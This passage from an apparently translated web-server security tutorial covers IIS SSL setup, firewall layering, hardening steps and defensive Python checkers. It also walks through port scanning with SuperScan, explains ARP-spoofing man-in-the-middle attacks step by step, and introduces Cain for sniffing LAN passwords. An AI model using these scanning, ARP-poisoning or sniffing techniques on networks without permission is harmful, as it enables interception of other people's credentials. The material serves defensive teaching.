- In the Pending Certificate Request dialog, choose Process the pending request and install the certificate, then Next.
- In the Process a Pending Request dialog, choose Browse and point to C:\cert.txt.
- In the SSL Port dialog, keep the default port 443, choose Next twice, then Finish.
- In the Default Web Site Properties dialog, choose View Certificate.
- Check that the certificate was issued by VeriSign.
Check the result
- Open Internet Explorer, go to https://www.MSOpenLab.com and confirm that the site loads successfully.
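Once the certificate is installed, a defender wants to confirm what the server actually presents. The following Python is an added example, not part of the original project or of IIS: it checks a certificate dict of the shape ssl.getpeercert() returns against the Common Name used above (www.msopenlab.com) and its validity window; the sample certificate, its placeholder issuer and its dates are constructed, and fetch_peer_cert is the live variant that is not run here.

```python
import socket
import ssl
import time


def host_matches(pattern, hostname):
    """RFC 6125 style match: exact, or a single leading '*.' wildcard label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern.startswith("*."):
        return (hostname.count(".") == pattern.count(".")
                and hostname.endswith(pattern[1:]))
    return pattern == hostname


def check_server_cert(cert, hostname, now=None):
    """Return the list of problems found; an empty list means the certificate
    is acceptable for `hostname` at time `now` (seconds since the epoch)."""
    now = time.time() if now is None else now
    problems = []
    # Name check: subjectAltName DNS entries first, Common Name as fallback.
    names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:
        names = [v for rdn in cert.get("subject", ()) for k, v in rdn
                 if k == "commonName"]
    if not any(host_matches(n, hostname) for n in names):
        problems.append("hostname %s not in %r" % (hostname, names))
    # Validity window, using the date format getpeercert() emits.
    if now < ssl.cert_time_to_seconds(cert["notBefore"]):
        problems.append("certificate not yet valid")
    if now > ssl.cert_time_to_seconds(cert["notAfter"]):
        problems.append("certificate expired")
    return problems


def fetch_peer_cert(hostname, port=443):
    """Live check: connect with a verifying TLS context (so an untrusted
    issuer fails here) and return the peer certificate dict."""
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()


# Constructed sample, shaped like getpeercert() output; the issuer name and
# dates are placeholders, not values from a real VeriSign certificate.
SAMPLE_CERT = {
    "subject": ((("organizationName", "MSOpenLab"),),
                (("commonName", "www.msopenlab.com"),)),
    "issuer": ((("organizationName", "Trial CA (placeholder)"),),),
    "subjectAltName": (("DNS", "www.msopenlab.com"), ("DNS", "msopenlab.com")),
    "notBefore": "Jan 10 00:00:00 2019 GMT",
    "notAfter": "Jan 24 00:00:00 2019 GMT",  # trial certificates are short-lived
}
T_VALID = ssl.cert_time_to_seconds("Jan 15 00:00:00 2019 GMT")
T_EXPIRED = ssl.cert_time_to_seconds("Feb 01 00:00:00 2019 GMT")

if __name__ == "__main__":
    print(check_server_cert(SAMPLE_CERT, "www.msopenlab.com", T_VALID))  # []
```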
2. Tools for surveying and finding web server vulnerabilities
A common protective perimeter for the whole network (layer 1), which includes the web system.
To deploy this first protective layer, organisations and businesses can install a unified threat management (UTM) security appliance that combines several security functions, such as:
- A firewall, which blocks network-layer attacks and stops scanning for security weaknesses in the operating systems of the servers.
- An intrusion prevention component (IPS), which removes attacks that exploit weaknesses in web application software, database software, operating systems and so on. In addition, virtual private network (VPN) and gateway-level virus scanning components make the system safer.
- A dedicated firewall for web applications.
After the common perimeter has been built, a dedicated web application firewall should be added (layer 2). This web application firewall inspects and blocks attacks that exploit weaknesses introduced while the website was being developed. Depending on the size of the organisation or business and/or on the value of the information held on the website, a corresponding level of investment can be made in this web application firewall.
There are three options:
- For websites that mostly hold static information (rarely changing), contain no important data and carry out no purchase transactions: a web application firewall software module (such as Check Point's Web Intelligence) can be added to the UTM appliance mentioned above.
- For websites that hold a great deal of important data that is vital to the organisation or business, that constantly process online transactions, and that therefore require high security and high availability: a dedicated web application firewall appliance should be installed (such as the solution from NetContinuum, a vendor specialising in dedicated web application firewall appliances).
- For websites that provide internal information or serve as an organisation's information access portal (Web Portal), letting employees connect from anywhere and work at any time: beyond the common protective layer provided by the UTM appliance, the organisation also needs to build a secure access gateway to its information resources (for example using Check Point's Connectra Web Security Gateway).
- For system security in general, a firewall can protect the computer system against intruders through its ability to block remote login sessions.
- It blocks traffic from outside (the Internet) into the protected network while letting legitimate users freely access the outside network. A firewall can also serve as a tool for monitoring hostile attacks from outside, so that the likelihood of an attack can be forecast before it happens.
Unified security appliance or network intrusion prevention appliance:
After investing in the two protective layers above, an organisation or business can add a unified security appliance or a dedicated network intrusion prevention (IPS) appliance (layer 3) to further strengthen information security. This layer divides the internal network into separate zones and applies a separate policy to each zone, in order to stop attacks that originate inside the network and to remove attacks that manage to get past the firewall into the zone holding the important servers.
Some methods of protecting the web server
Web servers are always targets for hackers looking for valuable information or wanting to cause disruption for some purpose. The threat can be anything from a denial-of-service attack, to advertising websites with objectionable content, to deleting or altering files, or planting software containing malicious code. The following are some methods of protecting a web server:
- Place the web servers in the DMZ. Configure the firewall to refuse connections to the web server on all ports except port 80 (HTTP), port 443 (HTTPS) and the ports of the services actually in use.
- Remove every unnecessary service from the web server, even the FTP file transfer service (keep it only if truly needed). Every unnecessary service can be abused to attack the system if it is not well secured.
- Do not allow remote administration of the system unless it is done with one-time passwords or over an encrypted connection.
- Limit the number of people who have administrative rights or top-level (root) access.
- Create log files that track user activity and keep these log files in an encrypted environment.
- The usual log management system should be used for any activity. Install macro traps to watch for attacks on the server. Create macros that run continuously, or at least that can check the integrity of the passwd file and other system files. When the macros detect a change, they should send an e-mail to the system administrator.
- Remove all unnecessary files from the directory holding executable scripts: /cgi-bin.
- Subscribe to and periodically apply the latest security fixes from the vendors.
- If the system must be administered remotely, require a security mechanism such as secure shell, which is used to create a secure connection. Do not use telnet or FTP with the anonymous user (require a username and password for access) from any unauthenticated site. Better still, limit connections to secured systems and to systems inside the intranet.
- Run the web server in directories with minimal access and usage rights, so that only the administrator can access the real system.
- Run the FTP server in anonymous mode (if the system needs it) in a directory with minimal access rights, separate from the directory used by the web server.
- Perform all updates from the intranet. Keep the master copy of the web pages on each server within the intranet and make changes and updates there; only then push the updates to the website over an SSL connection. If this is done hourly, the server can be kept from hanging for long periods.
- Scan the web server periodically with tools such as ISS or nmap to look for security holes.
- Install intrusion detection software on the servers, set it to alert on dangerous actions and to capture their sessions for review. This information can tell you how the network is being attacked, as well as the level of security in your system.
- Following the rules set out above will keep the web server better protected, and the network administrator will no longer have to suffer headaches and worries about web server safety and information security for the whole system.
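The recommendations above ask for continuous checks on the integrity of passwd and other system files, with an e-mail when something changes. Here is an added Python example of such a checker, not from the original document, that hashes a watched file list, compares it against a baseline and builds the alert text; the files, their contents and the simulated tampering are constructed inside a temporary directory, and the e-mail step is left to the caller.

```python
import hashlib
import os
import tempfile


def snapshot(root, names):
    """Return {name: sha256 hex digest} for the watched files under root;
    a file that does not exist maps to None."""
    result = {}
    for name in names:
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            result[name] = None
            continue
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        result[name] = h.hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Classify every watched file as changed, removed or created since baseline."""
    report = {"changed": [], "removed": [], "created": []}
    for name in sorted(baseline):
        old, new = baseline[name], current.get(name)
        if old == new:
            continue
        if new is None:
            report["removed"].append(name)
        elif old is None:
            report["created"].append(name)
        else:
            report["changed"].append(name)
    return report


def alert_lines(report):
    """Message body for the e-mail the text says should go to the administrator."""
    return ["INTEGRITY ALERT: %s was %s" % (name, kind)
            for kind in ("changed", "removed", "created") for name in report[kind]]


def demo():
    """Constructed scenario in a temporary directory: take a baseline, then
    simulate an unexpected edit of passwd and the deletion of hosts."""
    watched = ["passwd", "shadow", "hosts"]   # shadow is absent throughout
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")   # constructed content
        with open(os.path.join(root, "hosts"), "w") as f:
            f.write("127.0.0.1 localhost\n")
        baseline = snapshot(root, watched)
        with open(os.path.join(root, "passwd"), "a") as f:
            f.write("extra:x:0:0::/:/bin/sh\n")   # a second uid-0 account appears
        os.remove(os.path.join(root, "hosts"))
        return diff_snapshots(baseline, snapshot(root, watched))
```

A production run would store the baseline somewhere the web server cannot write and feed alert_lines() to the mail system.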
* SuperScan:
We will examine information on the network with the SuperScan tool. More specifically, we use SuperScan to scan one IP address and identify the vulnerabilities through which the system could be entered, via the ports the software reports as open.
Steps:
- After downloading SuperScan, run the program as shown in the figure below:
- In the program you can scan:
- Hostname/IP: enter the IP address to scan
- Or you can scan a whole IP range:
- Start IP: the first IP address
- End IP: the last IP address
To start scanning, click the Start button in the lower left corner.
SuperScan also has other options, such as:
- Host and Services Discovery: change the port numbers you want to scan on the IP address, or use the built-in Port list.
- Scan Options: change the host and service parameters.
- Tools: functions for checking and looking up information about an IP address or domain (Ping, whois, HTTP Header request, ...).
- Windows Enumeration: extended information about the IP address or domain (NetBIOS, MAC address, Workstation, ...).
Example: scanning the IP address 210.245.31.17 gives the result shown in the figure below:
Here, the IP address 210.245.31.17 has a total of 6 open ports: 5 TCP and 1 UDP.
According to the listing, the open TCP ports are:
- 21: FTP
- 23: Telnet
- 80: web
- 443: SSL
- 8001: a port opened by a Trojan
- To see the result in more detail, click View HTML Results.
From this we can identify the ports a hacker could abuse to get in and take measures to secure those ports.
- Other SuperScan features in the Tools section are ping, tracert and whois on a domain.
In the figure above we obtained the following information from a tracert of the domain www.itsea.net:
- This domain has IP address 207.210.81.150, is reached in 16 hops, and the server runs Linux with Apache 1.3.36 (Unix) and OpenSSL 0.9.7a.
- There are also a number of other functions for thoroughly extracting information about
- This is a very dangerous form of attack, called Man In The Middle. In this case it is like wiretapping a phone: the session between the sending and receiving machines carries on normally, so the user has no idea that they are under attack.
b. Overview of how it works:
- On the same network, Host A and Host B want to exchange data. The packets are passed down to the data link layer to be encapsulated, and the hosts must put the source MAC and destination MAC into the frame. So before data transfer can begin, the hosts have to ask each other for their MAC addresses.
- If Host A starts the MAC lookup first, it broadcasts an ARP request to all hosts asking for Host B's MAC. At that point Host B has Host A's MAC, and Host B alone replies to Host A with Host B's MAC (ARP reply).
- A Host C keeps sending ARP replies to Host A and Host B carrying Host C's MAC address but with the IP addresses of Host A and Host B. Host A now believes that machine B has MAC C. So the packets Host A sends to Host B all go to Host C, and the packets Host B sends back to Host A also go to Host C. If Host C enables forwarding, Host A and Host B will have no idea that they are the victims of an ARP attack.
- Example:
We have a model with the following hosts:
- Attacker: the hacker's machine used for the ARP attack
  IP: 10.0.0.11
  MAC: 0000.0000.1011
- Server: the machine being attacked
  IP: 10.0.0.12
  MAC: 0000.0000.1012
- HostA
  IP: 10.0.0.13
  MAC: 0000.0000.1013
- First, HostA wants to send data to the Server and needs the Server's MAC address in order to communicate. HostA broadcasts an ARP Request to all machines on the LAN asking which MAC address belongs to IP 10.0.0.12 (the Server's IP).
- Both Attacker and Server receive the ARP Request, but only the Server sends an ARP Reply back to HostA. The ARP Reply carries the Server's IP 10.0.0.12 and MAC 0000.0000.1012.
- HostA receives the ARP Reply from the Server, learns that the Server's MAC address is 0000.0000.1012 and begins transferring data to the Server. The Attacker cannot see the contents of the data exchanged between HostA and the Server.
The Attacker wants to carry out an ARP attack against the Server. The Attacker wants to be able to capture and read every packet HostA sends to the Server.
- The Attacker continuously sends ARP Replies carrying the Server's IP 10.0.0.12 together with the Attacker's own MAC address 0000.0000.1011.
- HostA receives these ARP Replies and believes that the Server's IP 10.0.0.12 has MAC address 0000.0000.1011. HostA stores this in its ARP cache and opens the connection.
- From now on, all information and data HostA sends to the machine with IP 10.0.0.12 (the Server) goes to MAC address 0000.0000.1011, the Attacker's machine.
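Taking the defender's view of the exchange above, the following added Python example (not from the original document) replays constructed ARP replies using the same addresses and flags the moment the Server's IP 10.0.0.12 is announced with the Attacker's MAC 0000.0000.1011, the way arpwatch-style monitors do; it assumes the first mapping seen for an IP is genuine, which in practice is replaced by a known-good table or static ARP entries.

```python
from collections import defaultdict

# Constructed ARP replies, using the addresses from the scenario above
# (Server 10.0.0.12 / 0000.0000.1012, Attacker 10.0.0.11 / 0000.0000.1011,
# HostA 10.0.0.13 / 0000.0000.1013). Each tuple: (time, sender IP, sender MAC).
SAMPLE_REPLIES = [
    (1.0, "10.0.0.12", "0000.0000.1012"),  # genuine reply from the Server
    (1.1, "10.0.0.11", "0000.0000.1011"),  # Attacker answering for its own IP
    (5.0, "10.0.0.12", "0000.0000.1011"),  # Server's IP now paired with Attacker's MAC
    (5.5, "10.0.0.12", "0000.0000.1011"),  # repeated, as the forged replies keep coming
    (6.0, "10.0.0.13", "0000.0000.1013"),  # HostA, unrelated
]


class ArpWatch:
    """arpwatch-style monitor: pins the first MAC seen for each IP and flags
    (a) replies that contradict the pinned MAC and (b) one MAC claiming several IPs."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self.alerts = []

    def observe(self, t, ip, mac):
        """Feed one ARP reply; return the alerts it triggered (possibly none)."""
        mac = mac.lower()
        new = []
        known = self.ip_to_mac.get(ip)
        if known is None:
            self.ip_to_mac[ip] = mac            # first sighting: trust and pin it
        elif known != mac:
            new.append("t=%.1f: %s changed MAC %s -> %s" % (t, ip, known, mac))
        if ip not in self.mac_to_ips[mac]:
            self.mac_to_ips[mac].add(ip)
            if len(self.mac_to_ips[mac]) > 1:
                new.append("t=%.1f: MAC %s now claims %s"
                           % (t, mac, sorted(self.mac_to_ips[mac])))
        self.alerts.extend(new)
        return new


def run(replies=SAMPLE_REPLIES):
    """Replay a list of replies through a fresh monitor and return all alerts."""
    watch = ArpWatch()
    for t, ip, mac in replies:
        watch.observe(t, ip, mac)
    return watch.alerts


if __name__ == "__main__":
    for line in run():
        print(line)
```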
3. Using the CAIN software
- Cain is an effective sniffer today. Its features allow a sniffer to obtain confidential information on the LAN such as e-mail passwords and the passwords of FTP, telnet and other services.
a. Hardware requirements:
- 10 MB of free disk space
- Operating system: Windows 2000/2003/XP
- WinPcap must be installed
b. Installation:
- Choose Next.
- Choose Next.
- Choose Finish.
During installation Cain requires the WinPcap library to be installed alongside it.